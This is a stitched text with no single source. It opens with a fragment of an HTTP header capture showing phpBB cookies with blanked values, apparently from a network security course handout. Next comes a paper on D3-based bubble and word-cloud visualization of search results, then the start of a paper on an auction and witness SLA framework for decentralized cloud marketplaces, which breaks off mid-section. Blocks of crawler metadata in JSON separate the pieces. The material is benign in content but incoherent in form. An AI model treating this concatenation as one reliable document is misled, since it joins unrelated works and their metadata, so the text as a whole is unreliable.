Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2mysql_data=......;phpbb2mysql_sid=......
Content-Type: application/x-www-form-urlencoded
Content-Length: 376

subject=<Content of the message>

HTTP/1.x 200 OK
Date: Thu, 11 Jun 2009 19:43:15 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3
X-Powered-By: PHP/5.2.6-3ubuntu4.1
Set-Cookie: phpbb2mysql_data=XXXXXXXXXXX; expires=Fri, GMT; path=/
Set-Cookie: phpbb2mysql_sid=YYYYYYYY; path=/
Set-Cookie: phpbb2mysql_t=XXXXXXXXXX; path=/
Cache-Control: private, pre-check=0, post-check=0, max-age=0
Expires: 0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3904
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
```

Figure 2: Screenshot of LiveHTTPHeaders Extension
{"Source-Url": "http://courses.isi.jhu.edu/netsec/project2/proj2.pdf", "len_cl100k_base": 6050, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 24390, "total-output-tokens": 6885, "length": "2e12", "weborganizer": {"__label__adult": 0.0007643699645996094, "__label__art_design": 0.00044417381286621094, "__label__crime_law": 0.006317138671875, "__label__education_jobs": 0.005229949951171875, "__label__entertainment": 0.00011771917343139648, "__label__fashion_beauty": 0.0002715587615966797, "__label__finance_business": 0.0002486705780029297, "__label__food_dining": 0.00051116943359375, "__label__games": 0.0012311935424804688, "__label__hardware": 0.001972198486328125, "__label__health": 0.0007386207580566406, "__label__history": 0.0003199577331542969, "__label__home_hobbies": 0.00019216537475585935, "__label__industrial": 0.0007319450378417969, "__label__literature": 0.000331878662109375, "__label__politics": 0.00040650367736816406, "__label__religion": 0.0005693435668945312, "__label__science_tech": 0.0283050537109375, "__label__social_life": 0.0002267360687255859, "__label__software": 0.0290374755859375, "__label__software_dev": 0.9208984375, "__label__sports_fitness": 0.0003681182861328125, "__label__transportation": 0.00045108795166015625, "__label__travel": 0.00023567676544189453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26865, 0.02381]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26865, 0.41336]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26865, 0.80348]], "google_gemma-3-12b-it_contains_pii": [[0, 2739, false], [2739, 5225, null], [5225, 7931, null], [7931, 10170, null], [10170, 13185, null], [13185, 16150, null], [16150, 19187, null], [19187, 22484, null], [22484, 23542, null], [23542, 25712, null], [25712, 26865, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2739, true], [2739, 5225, null], [5225, 7931, null], [7931, 10170, null], [10170, 13185, null], [13185, 16150, null], [16150, 19187, null], [19187, 22484, null], [22484, 23542, null], [23542, 25712, null], [25712, 26865, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26865, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26865, null]], "pdf_page_numbers": [[0, 2739, 1], [2739, 5225, 2], [5225, 7931, 3], [7931, 10170, 4], [10170, 13185, 5], [13185, 16150, 6], [16150, 19187, 7], [19187, 22484, 8], [22484, 23542, 9], [23542, 25712, 10], [25712, 26865, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26865, 0.01724]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
d9f9dcb899b75b4ccbfb4ba8e79bfb6c1e0a65ae
Visualization of Search Results of Large Document Sets

James D Anderson and Thomas Wischgoll; Wright State University; Dayton, OH

Abstract

When presented with many search results, finding information or patterns within the data poses a challenge. This paper presents the design, implementation, and evaluation of a visualization enabling users to browse through voluminous information and comprehend the data. Implemented with the JavaScript library Data Driven Documents (D3), the visualization represents the search as clusters of similar documents grouped into bubbles with the contents depicted as word-clouds. Highly interactive features such as touch gestures and intuitive menu actions allow for expeditious exploration of the search results. Other features include drag-and-drop functionality for articles among bubbles, merging nodes, and refining the search by selecting specific terms or articles to receive more similar results. A user study consisting of a survey questionnaire demonstrated that, in comparison to a standard text-browser for viewing search results, the visualization performs comparably or better on most metrics.

Introduction

Searching large document sets quickly and efficiently presents a challenge to data analysts, who may or may not have a precise set of search terms capable of generating the specific results they are seeking. Analysts may have millions of documents at their disposal and only a few search terms in mind, and that search query can return thousands or more results. The analyst may desire to query a broad topic area and filter out undesired results, focusing on various sub-topics present within the results. Furthermore, most applications currently available for browsing results are purely text-based and display a listing of results which may or may not be ranked. If the results are ranked, there may be documents hidden deep in the list that the analyst may wish to view; however, since those results are lower in the list, they have less likelihood of being seen than results higher in the list.

In contrast to the typical textual listing of results, graphical search browsers offer a different approach to presenting search results. Graphical browsers typically provide a visual representation with similar results grouped closer together, and the groupings can be represented by the encompassing topics or terms shared by the documents. The visual representations also allow users to explore and interact with the results in novel ways not available with traditional search browsers.

This paper presents a design, shown in Figure 1, which visualizes a document set in a tree structure with the main search terms represented at the root and the more refined results appearing in child nodes. The project is developed as a web-based application, which utilizes the built-in interactivity that a web browser provides as well as being cross-platform compatible. The visualization evaluation was conducted with participants performing a search task and afterward providing feedback on the application.

Background

Users wishing to browse search results are typically given a plain text listing of the documents returned from the query. With the advent of better graphics capabilities and algorithms to find patterns among documents, visualizations have developed as an alternative.
To meet this end, clustering processes are often utilized to group similar documents. Additionally, because the structure of many data sets can be visualized as a graph, there has been much work on visualizing these large relational data structures. Traditional Search Traditionally, search results of text-based data are viewed in a list format. For example, the Google search browser provides a summary of the topic in addition to the results listed as text. Typically, the results are shown sorted by a ranking metric such as Google’s uses a PageRank [1]. For Google results, the anchor text, or click-able portion of a link, for each search result is not just the text of the web page but also any images, video, programs, or databases. Document Set Visualizations To visualize textual information, various methods have been developed to reduce the complexity from hundreds and thousands of terms to a more sizable and human-understandable space. Two common methods, document topic generation and clustering [2, 3], use term frequency-inverse document frequency (TFIDF) with word-vectors and Latent Dirichlet allocation (LDA). LDA is a statistical model which assigns probabilities to topics based on the collection of terms within a document [4]. With LDA, connections between documents can be made even though the documents themselves may consist of mostly disjoint sets of terms. Once terms and topics are generated from the documents, a common visualization method is a word-cloud. With this technique, the terms are presented with their font sizes proportional to the significance or probability of being related to the data set and typically arranged so as to minimize empty space. Rolled-out Wordles [5] demonstrates a heuristic for building word clouds by removing overlaps between elements. TagCrowd represents documents as word-clouds with the size of a word being proportional to its frequency within the text [6]. Another technique called Hierarchical point placement (HIPP) [6] has circles, or “bubbles” with proximities proportional to similarity between the document sets, while the circles represent similar documents. DiTop-View [7], a visualization method with bubbles and word-clouds, partitions the canvas into different background colors which represent major topic areas. Many visualization methods utilize document clustering to group semantically similar documents. One such, iVisClustering [8], clusters documents by topic utilizing LDA to generate a graph visualization where closely related documents are grouped together with a display of topic words. **Graph Visualizations** Several graphical frameworks for depicting relational data have been developed, and this paper’s design takes inspiration from ontology-related visualizations. In particular, WebVOWL [9] is a web-based visualization tool for graphic display of an ontology which utilizes Scalable Vector Graphics (SVG) and Cascading Style Sheets (CSS) along with the JavaScript library Data Driven Documents (D3) [10] to display force-directed graphs. This approach allows for dynamic addition, removal, and repositioning of nodes, as the visualization will adjust to the change in graph structure. Another inspiration for this project is the TouchGraph Navigator [11]. Similar to WebVOWL, TouchGraph can create visualization for the web; however, it is implemented in Java. TouchGraph allows the user to import data tables which are then visualized in a graph structure. It contains clustering algorithms which will reveal relations intrinsic to the data. 
Additionally, the application can visualize the interconnectivity of web sites on the Internet by graphing the links between pages. In contrast to all the described applications, the approach presented in this paper allows users to perform actions on the visualization, such as merging groups of results to refine the search into a particular topic. The user may select a term in order to view documents more associated with the desired term. Furthermore, the user can select articles to receive additional results similar to the chosen documents.

**Implementation**

The search visualization allows users to get a general overview of the topics their search terms may cover and then narrow down the scope of the search until discovering desired results. After the user enters the initial query, the application generates a central "bubble" that contains the search terms. This bubble acts as the root of a tree in which each child represents a subset of the documents of its parent. In each child node, a word-cloud depicts the most prevalent topics and terms from the set of documents it represents.

In terms of functionality, the user can refine a search by selecting a term in one of the bubbles, and a new child is created to represent the documents which best fit this term. After multiple children have been created from a single parent, those children can be merged together to represent a new subset of documents. Children are merged by performing a union operation on their document sets. With regard to search data, the system draws its input from a machine learning-based search. This search algorithm utilizes a neural network and semantic hashing [12]. For this visualization, a dataset of Reuters articles serves as the basis for search queries.

**Client Visualization**

As seen in Figure 2, the visualization is divided into three sections: input (top-left), output (bottom-left), and the graphical tree (right). In the input area, a standard text-input box allows the user to type in the initial search query. The text-based output of the search results appears as hyper-links, enabling the user to easily access the documents. "Yes" and "No" check-boxes enable the user to indicate whether they wish to see results similar or dissimilar to the given document as part of the Refine action.

The right section of Figure 2 contains the visualization of the search results. When the program begins, a single bubble containing a word-cloud, the suggested search terms bubble, appears. As the user clicks on documents, this bubble is populated with terms relating to those documents. When the user initiates a search, a bubble will appear containing those search terms as the root of the new query. New bubbles connected to the root are then generated, populated with terms related to a sub-group of the entire search.

**Main Search**

The structure of a search result is presented visually as a force-directed graph utilizing the D3 library for JavaScript. D3 provides a programming interface through which Hypertext Markup Language (HTML) elements such as SVG can be manipulated. D3 also provides layouts to visualize datasets; this project utilizes two D3 layouts: force graphs and pie charts.

**Force Graphs**

The force layout simulates charged particles that are constrained by the links between nodes in order to generate the positions of the nodes [13]. As such, the charge strength for each node can be set, determining how strongly nodes repel each other, as well as the strength of the links between connected nodes.
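As a minimal, hedged sketch of how such a force layout can be configured, the following uses the D3 version 3 force layout API (which exposes charge, friction, and link strength as described here); newer D3 releases use d3.forceSimulation instead. The node and link data and the numeric values are illustrative assumptions, not the settings used in the actual application.

```javascript
// Minimal D3 (v3-style) force-directed graph sketch.
// Node/link data and numeric settings are illustrative assumptions.
var nodes = [{name: "search terms"}, {name: "cluster 1"}, {name: "cluster 2"}];
var links = [{source: 0, target: 1}, {source: 0, target: 2}];

var svg = d3.select("body").append("svg")
    .attr("width", 800).attr("height", 600);

var force = d3.layout.force()
    .nodes(nodes)
    .links(links)
    .size([800, 600])
    .charge(-300)          // how strongly nodes repel each other
    .linkDistance(150)     // preferred length of each link
    .linkStrength(0.8)     // how rigidly links enforce that length
    .start();

// One SVG circle per search bubble.
var circles = svg.selectAll("circle")
    .data(nodes)
  .enter().append("circle")
    .attr("r", 40)
    .attr("stroke", "steelblue")
    .attr("stroke-width", 2)
    .attr("fill", "white")
    .call(force.drag);     // allow bubbles to be dragged

// Update circle positions on every simulation tick.
force.on("tick", function() {
  circles.attr("cx", function(d) { return d.x; })
         .attr("cy", function(d) { return d.y; });
});
```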
Additionally, a friction attribute determines how quickly the nodes’ velocity decays. In order to have the nodes drawn in the browser, a graphic element must be appended. This element can be any graphic, but for simplicity an SVG circle is used to represent the search nodes. Once attached, D3 provides functions to alter the HTML attributes of SVG elements. For SVG circles, some attributes include radius, stroke (color of the outline) and stroke width. The value provided can either be a constant or a function which returns a value based on the node. The function that gets called is given two parameters: the node data and the node index. This function gets called for each node, providing an alternative to looping through each node. Along with providing the details for HTML graphic elements, D3 allows event listeners to be attached to SVG elements. For example, functions can be written on events such as mouseover, mouseout, mousedown, and mouseup. There are also events specific to touch screen devices which this project utilizes. When an event such as a mouse click is triggered, the click is registered for all elements the mouse is currently over. This may be undesired, since each bubble is being drawn into the browser window, and when clicking a node the event is triggered for both the node and the window. To avoid this, D3 provides a function d3.event.sourceEvent.stopPropagation(). When this function is called, any other elements involved in the event will not have their event listener called. This is particularly useful in the word-cloud function. Additionally, the default actions that occur on these events can be overridden by using d3.event.sourceEvent.preventDefault(). This function is called when the nodes are being dragged. Instead of the default event, D3 provides custom functionality for handling drag events. **Word-clouds** To summarize the results contained within a node, the visualization utilizes word-cloud representations. The concept behind the word-cloud representation is to provide a quick overview of a group of search results as well as allowing the user suggestions on additional terms which may be helpful in refining the search query. Visually, the font size of each term corresponds to how strongly the term correlates to the set of documents contained within that bubble. The font size is relative to a given bubble and not to the search results as a whole. One modification made to the word-cloud layout generation for this project is to change the layout from fitting the words into a square area. Since the word-clouds for this project reside within circular bubbles, the word-cloud positions are bounded to a circular layout. This modification may be useful in future iteration of the program, such as changing the bubbles from circles to ellipses. In this case, the major- and minor-axes attributes can be passed into the word-cloud layout generator. **Interface** The visualization provides several means for the user to interact with and refine the search results. The application has been programmed to allow for both a mouse and multi-touch displays to be utilized. There are two categories of interactions: gesture actions and menu selections. **Gestures** For the purposes of this project, gestures pertain to both touch and mouse pointer actions. Much of the functionality of the mouse is copied for touch functionality, but some actions are handled separately. 
For instance, using the mouse-wheel will zoom in and out of the visualization, while the same action is achieved with a pinch gesture on a touch display. Navigating the entire visualization is achieved by clicking or touching a blank area and dragging the canvas. Several objects in the visualization can be dragged around the screen. When dragging a bubble with the mouse pointer or touch display, the attached bubbles will follow and reorient themselves, allowing the user to rearrange the configuration of the visualization. When using a multi-touch display, multiple bubbles can be dragged simultaneously, including those which belong to the same search or bubbles of a separate search.

The user can drag-and-drop the terms in the suggested search terms bubble into any of the search bubbles, allowing a new term to be utilized in a search refinement. Additionally, the user can drag a search result link from the left panel into one of the search bubbles. This action causes the link to be checkmarked "Yes" so it is utilized when refining results, as well as populating the target bubble with words relevant to the dragged link.

In order to view the documents contained in a bubble, the user can either hover the mouse over the bubble or touch and hold. After doing so, the contents will appear in the left pane of the web browser. Additionally, the menu will appear around the bubble.

**Menu**

The menu interface in Figure 3 provides access to various functions which can be performed. Most of the menu items describe actions that take place immediately when the button is clicked or pressed. However, two of the items, Add and Move, toggle the mode of interaction. Move mode allows bubbles to move freely and disables clicking on terms. In Add mode, terms become click-enabled, which causes the application to perform an additional search using that term and add the result as a child of the current bubble.

The rendering of the menu is done utilizing D3's pie chart layout and SVG arcs. The menu is shown in detail in Figure 3. For the SVG arc, the inner and outer radius can be specified, which is utilized to create a cut-out for the search result bubble, as the center of the pie chart is translated to the x- and y-coordinates of the node.

Server-side Search

When the user enters a search query or chooses to refine the search parameters, an HTTP request is sent to a server hosting a search script which utilizes a neural network trained to generate search results from a set of Reuters news articles. The script then clusters the results, forming the basis of the nodes for the visualization. To execute the search and parse the results for visualization, a Python script is hosted on an Apache web server with Common Gateway Interface (CGI) enabled.

Along with generating terms for the word-clouds, the script is capable of generating topic terms for the search as a whole. To accomplish this, the TFIDF vectors for each document are used to calculate the non-negative matrix factorization (NMF) [14] for the document set. NMF is capable of extracting topics from a document set, and these topics can be utilized by the visualization. Additionally, the search process utilizes semantic hashing [12], a machine learning approach to searching which involves training a neural network whose inputs are documents represented as word-vectors, where each feature is the frequency of a particular term.
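As a rough illustration of this word-vector representation (not the project's actual Python pipeline), the following sketch builds raw term-frequency vectors over a small, made-up vocabulary; the vocabulary and the example document are assumptions for demonstration only.

```javascript
// Illustrative sketch: term-frequency word-vectors over a fixed vocabulary.
// The vocabulary and example document are made up for demonstration.
var vocabulary = ["beijing", "olympics", "medal", "market", "oil"];

function termFrequencyVector(text) {
  var counts = {};
  text.toLowerCase().split(/\W+/).forEach(function(token) {
    counts[token] = (counts[token] || 0) + 1;
  });
  // One feature per vocabulary term, holding that term's frequency.
  return vocabulary.map(function(term) { return counts[term] || 0; });
}

var doc = "Beijing hosted the Olympics; the Olympics drew record crowds.";
console.log(termFrequencyVector(doc)); // [1, 2, 0, 0, 0]
```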
Semantic hashing also offers the capability to generate results similar to a given set of specific documents, providing the ability to refine search results. Bit-vectors of specific documents can be compared with vectors of other documents to find more semantically similar articles. The visualization incorporates this capability in two ways: 1) checking the “Yes” box next to a result and 2) dragging a document into a bubble. After performing either of these actions, the user may “refine” the search. Doing so executes the above described capability of finding documents similar to a subset, and these results are returned to the visualization as a refinement of the search. Evaluation To evaluate the application, a group of volunteer participants (N = 12) performed a task utilizing the graphical visualization search browser and after-completed a user survey. Each participant browsed results from the same search query of “beijing olympics” in order to find a distinct piece of information. The query and tasks were chosen based on the data-set for which the neural-network was trained. The data utilized as the search basis was a set of 94,065 Reuters articles from the time-frame of around 2007-2008. The surveys were designed to test the effectiveness and convenience of the visualization versus a normal text-based search browser. As such, the participant conducted the same task twice: once with the graphical-browser and once with the text-browser. Half of the participants utilized the graphical-browser first and the other half performed the task first in the text-browser. In the presentation of results that follows, the former group is named Group 1 and the latter named Group 2. All participants performed the search-task on the same machine running Firefox in Windows 10. A touchscreen display was utilized, and users were given the option to browse employing either touch- or mouse-gestures, or a combination of both input modes. User Surveys After completing the search tasks, participants completed a survey comprised of multiple choice questions and one open-ended question. A summary of the questionnaire statistical analysis is shown in Table 1. The listing shows the means of responses from Groups 1 and 2, as well as the overall mean, normalized between 1.0 and 0.0 with 1.0 corresponding to most favorable to the visualization and 0.0 least favorable. Also shown are the standard deviations (σ) for all responses to the particular question, which range from 0.15 to 0.31. A t-test was done for each question comparing the difference in responses between Groups 1 and 2, and while one question received a p-value of 0.051, the other p-values were relatively larger. Because of this, a power analysis was done (α = 0.05, power = 0.8) to determine a suitable sample size to validate the differences between the groups. A few questions indicate a sample size of around 35-40 would be sufficient; however, several of the required sample size values suggest a much larger sample size is required. This result may also indicate there is actually no significant difference between the two groups, and the participants viewed utilizing the graphical browser equivalent to the text browser. Open-ended Responses One open-ended question was asked in the survey: In what way would you improve the search?. Feedback statements generally relate to 3 different categories: Interactivity, the Visualization, and the Search Engine. In terms of interactivity, responses generally stated a preference for more gesture based interaction. 
Responses about the visualization varied, from suggesting making the size of the bubbles correspond to the number of articles represented to being able to focus on a particular search term. One statement regarded the formatting of the article text, which was presented as unformatted American Standard Code for Information Interchange (ASCII) text. Since the data was provided as plain text, the articles were displayed with no processing. Both the graphical browser and text-based search displayed the articles in this way, mostly to remove any bias with respect to either browsing mode. The last category of responses related to the search engine itself. One regarded the fact that some bubbles contained primarily numbers, and the other recommended more training of the neural network. Conclusion Presented with a large amount of search results, users may have difficulty making sense of the information and patterns hidden within. The visualization designed and implemented for this project concerns interactively browsing large document sets from a search. To meet this end, the set of results is displayed graphically as a tree, and the nodes of the tree are similar documents shown in a bubble with a word-cloud of terms relevant to the results contained. Users can interact with the visualization by dragging nodes around to rearrange the structure, refine the search by selecting terms or articles within a particular bubble, and perform other actions such as merging and deleting nodes. The visualization was evaluated with a user study wherein users were given a specific data item to find within the visualization. The statistics from the evaluation do not show strong confidence in the result; nonetheless, the data trends toward the fact that the visualization performs as well or better than a standard text-based browser. **Acknowledgments** The authors wish to thank Eric Nichols, Brad Minnery, and Michael Raymer. This work was supported in part by a grant from the Ohio Federal Research Network (ORFN). **References** **Author Biography** James Anderson received his MS in computer engineering in 2018 from Wright State University, and is working on his PhD at the same institution. His research work is in collaboration with researchers at the Air Force Institute of Technology (AFIT) on simulating and analyzing flights involving automated aerial refueling. He has presented and published in the International Symposium on Visual Computing conference proceedings. Thomas Wischgoll received his Master's degree in computer science in 1998 from the University of Kaiserslautern, Germany, and his PhD from the same institution in 2002. He was working as a post-doctoral researcher at the University of California, Irvine until 2005 and is currently an associate professor and the Director of Visualization Research at Wright State University. His research interests include large-scale visualization, flow and scientific visualization, as well as biomedical imaging and visualization. His research work in the field of large-scale, scientific visualization and analysis resulted in more than thirty peer-reviewed publications, including IEEE and ACM. Dr. Wischgoll is a member of ACM SIGGRAPH, IEEE Visualization & Graphics Technical Committee, and the IEEE Computer Society.
{"Source-Url": "http://avida.cs.wright.edu/publications/pdf/P41.pdf", "len_cl100k_base": 4658, "olmocr-version": "0.1.49", "pdf-total-pages": 5, "total-fallback-pages": 0, "total-input-tokens": 15639, "total-output-tokens": 5771, "length": "2e12", "weborganizer": {"__label__adult": 0.0003597736358642578, "__label__art_design": 0.0024356842041015625, "__label__crime_law": 0.00042319297790527344, "__label__education_jobs": 0.0032596588134765625, "__label__entertainment": 0.00024771690368652344, "__label__fashion_beauty": 0.00022292137145996096, "__label__finance_business": 0.0003879070281982422, "__label__food_dining": 0.0003616809844970703, "__label__games": 0.0007457733154296875, "__label__hardware": 0.0016603469848632812, "__label__health": 0.0006184577941894531, "__label__history": 0.0006003379821777344, "__label__home_hobbies": 0.0001361370086669922, "__label__industrial": 0.0004074573516845703, "__label__literature": 0.0008502006530761719, "__label__politics": 0.0002620220184326172, "__label__religion": 0.0005326271057128906, "__label__science_tech": 0.24560546875, "__label__social_life": 0.00018036365509033203, "__label__software": 0.0950927734375, "__label__software_dev": 0.64453125, "__label__sports_fitness": 0.0002301931381225586, "__label__transportation": 0.000530242919921875, "__label__travel": 0.0002391338348388672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26982, 0.01376]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26982, 0.42017]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26982, 0.90762]], "google_gemma-3-12b-it_contains_pii": [[0, 4665, false], [4665, 10430, null], [10430, 16005, null], [16005, 22732, null], [22732, 26982, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4665, true], [4665, 10430, null], [10430, 16005, null], [16005, 22732, null], [22732, 26982, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26982, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26982, null]], "pdf_page_numbers": [[0, 4665, 1], [4665, 10430, 2], [10430, 16005, 3], [16005, 22732, 4], [22732, 26982, 5]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26982, 0.0]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
1b4f5c4fc92b0c053004980c0740ac23bae50d1d
An auction and witness enhanced trustworthy SLA model for decentralized cloud marketplaces
Shi, Z.; Farshidi, S.; Zhou, H.; Zhao, Z.

DOI: 10.1145/3462203.3475876
Publication date: 2021
Document Version: Proof
Published in: GoodIT '21
License: CC BY

An Auction and Witness Enhanced Trustworthy SLA Model for Decentralized Cloud Marketplaces

Zeshun Shi
z.shi2@uva.nl
University of Amsterdam
Amsterdam, the Netherlands

Huan Zhou
huanzhou@nudt.edu.cn
National University of Defense Technology
Changsha, China

Siamak Farshidi
s.farshidi@uva.nl
University of Amsterdam
Amsterdam, the Netherlands

Zhiming Zhao
z.zhao@uva.nl
University of Amsterdam
Amsterdam, the Netherlands

ABSTRACT

Cloud computing has become one of the most important technologies that have changed the traditional application development and operation (DevOps) lifecycle. However, current cloud software DevOps often faces the following key challenges: 1) selecting the best fitting service providers, customizing services, and planning capacities for large-scale distributed applications; 2) guaranteeing high-quality and trustworthy service level agreements (SLAs) among multiple service providers; 3) enhancing the interoperability of cloud services across providers; 4) designing effective incentive models among the players. In this study, a framework called AWESOME is proposed to build a decentralized cloud marketplace and to address the above challenges. The proposed framework contains four subsystems, including a customizable auction model, an incentive witness mechanism, and a social behavior-based simulator, integrated in one automated framework. We also provide a proof of concept to demonstrate that the AWESOME framework is feasible.

CCS CONCEPTS

• Social and professional topics → Online auctions policy; • Security and privacy → Trust frameworks.

KEYWORDS

decentralized cloud marketplace, auction, service level agreement

1 INTRODUCTION

The cloud computing paradigm provides flexible services based on pay-as-you-go business models [2]. Several well-known service providers maintain the traditional cloud marketplace, and the share of these top providers is continuously growing. According to the reports, as of October 2020, AWS, Azure, Google, and Alibaba control 63% of the entire cloud marketplace, whereas all other providers only share 37%¹. Since product migration is complex, consumers become locked into a particular provider's ecosystem. In the future, however, we should expect a more open, fair, and trustworthy cloud resource trading marketplace for all service providers and customers.

There are usually two approaches to building a cloud marketplace: centralized and decentralized [8].
In a centralized cloud environment, all service trading transactions and trust-related issues rely on trusted third parties (TTP), e.g., some well-known cloud service providers with good reputations. However, those providers are not always trustworthy in practice and can be biased or conspire with any party. In a decentralized environment, however, transaction management and operations are performed by all sellers/buyers, which avoids the concentration of power and makes the transactions more trustworthy. In this case, all trust assurance comes from a distributed infrastructure (e.g., blockchain), which needs to be appropriately designed, implemented, deployed, and monitored.

Traditionally, a Service Level Agreement (SLA) is a business concept that defines the contractual financial agreements between the roles who are engaging in the business activity. In the context of a cloud marketplace, it is an agreement between the cloud customer and provider regarding the cloud service quality [6]. For instance, the IaaS (Infrastructure-as-a-Service) provider Amazon Elastic Compute Cloud (EC2) claims that the availability of its data center is no less than 99%. If this number is not achieved, it will pay back 30% credits to its customers as compensation. In practice, however, this agreement is hard to enforce in a fair and transparent manner; it is usually performed manually and dominated by giant providers in the traditional SLA management process.

Blockchain technology brings in a new hint for possible solutions to address these challenges [9]. It inspires the emergence of a new decentralized cloud marketplace that encourages greater inclusivity and participation from different service parties. It is foreseeable that this decentralized marketplace will provide more choices and opportunities for both providers and consumers. Besides, the smart contract makes it possible to manage and automate the SLA process on the blockchain in a fair and tamper-proof way [7]. However, reaching a consensus on events that occur outside the blockchain is another possible issue. Cloud customers/providers can still violate the agreed SLA in a blockchain-based decentralized cloud marketplace. For example, the provider may not provide the QoS (Quality of Service) they promised, and the customer may refuse to pay for the claimed cloud resources. In the blockchain community, the bridge between on-chain and off-chain events is called an "oracle" [5]. One of the solutions to build this bridge is to retrieve data from Oraclize², a third-party company that performs as a trusted data source for the blockchain. However, this solution suffers from a single point of failure (SPOF) and needs extra commission fees.

¹ https://www.canalys.com/newsroom/worldwide-cloud-market-q320

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org.
GoodIT '21, September 9–11, 2021, Roma, Italy
© 2021 Association for Computing Machinery.
ACM ISBN 978-1-4503-8478-0/21/09...$15.00
https://doi.org/10.1145/3462203.3475876
In this case, a decentralized and trustworthy witness mechanism is needed to judge SLA violations that occur off-chain. This paper expects to enhance the trustworthiness of cloud auction and SLA by introducing a novel Auction and Witness Enhanced decentralized trustworthiness SLA for Open, decentralized service MarkEtplaces (AWESOME) framework. Specifically, a new role called the witness is involved in the entire cloud service trading process, shown in Figure 1. The decentralized blockchain users can join the SLA judgment and work as witnesses through a carefully designed incentive mechanism that motivates witnesses to make effective judgments to win profits. In the rest of this paper, we first demonstrate the current requirements and related works in building a decentralized cloud marketplace in Section 2. Two industrial use cases summarize these requirements and challenges. Then, to address these challenges, we propose the AWESOME framework and present the detailed architecture overview and technical details in Section 3. Next, Section 4 shows a proof of concept to demonstrate the feasibility of the AWESOME framework. Finally, We conclude the entire paper in Section 5. 2 REQUIREMENTS AND RELATED WORK In industrial innovations (e.g., crowd journalism and smart transportation) and scientific applications (e.g., research data management and disaster early warning), cloud services are playing an increasingly important role in real-time processing information (e.g., multimedia acquired by mobile devices), running simulations (e.g., for predicting possible disasters) and for enabling extensive scale collaborations (e.g., for running distributed scientific workflows). Therefore, it is necessary to employ multiple data centers or providers to handle decentralized collaboration between data and resource providers and customers in several industrial use cases. (1) Use case 1. Decentralized cloud marketplace for social media (taken from EU ARTICONF project): crowd journalism for real-time news reporting during live sports, music events, or natural disasters. Individual citizen journalists make photos or videos of the "news" and trade them via the news platform. The system has to detect fake news from those crowdsourced content by running real-time processing in a decentralized cloud service marketplace for those media contents, or engage human experts to review them. (2) Use case 2. Decentralized service marketplace for medical data management (taken from EU CLARIFY project): sharing and utilizing pathology data provided by hospitals or individuals from different countries, where various medical data access constraints are often applied. When a machine learning application for studying breast cancer must use data from multiple hospitals, the application developer has to select cloud providers from a decentralized marketplace that meet the application needs (e.g., geolocation, capacity, and price). We can therefore highlight the following requirements and challenges from those use cases: - Provider selection, service customization, and capacity planning challenges. The developer has to select cloud services from different providers (very often multiple ones) due to distributed data locations (e.g., sensors or repositories), diverse data access constraints (e.g., for medical data), performance constraints (e.g., for real-time decisions in early warning). The various price and reputation models make the selection time-consuming and challenging to be optimal. 
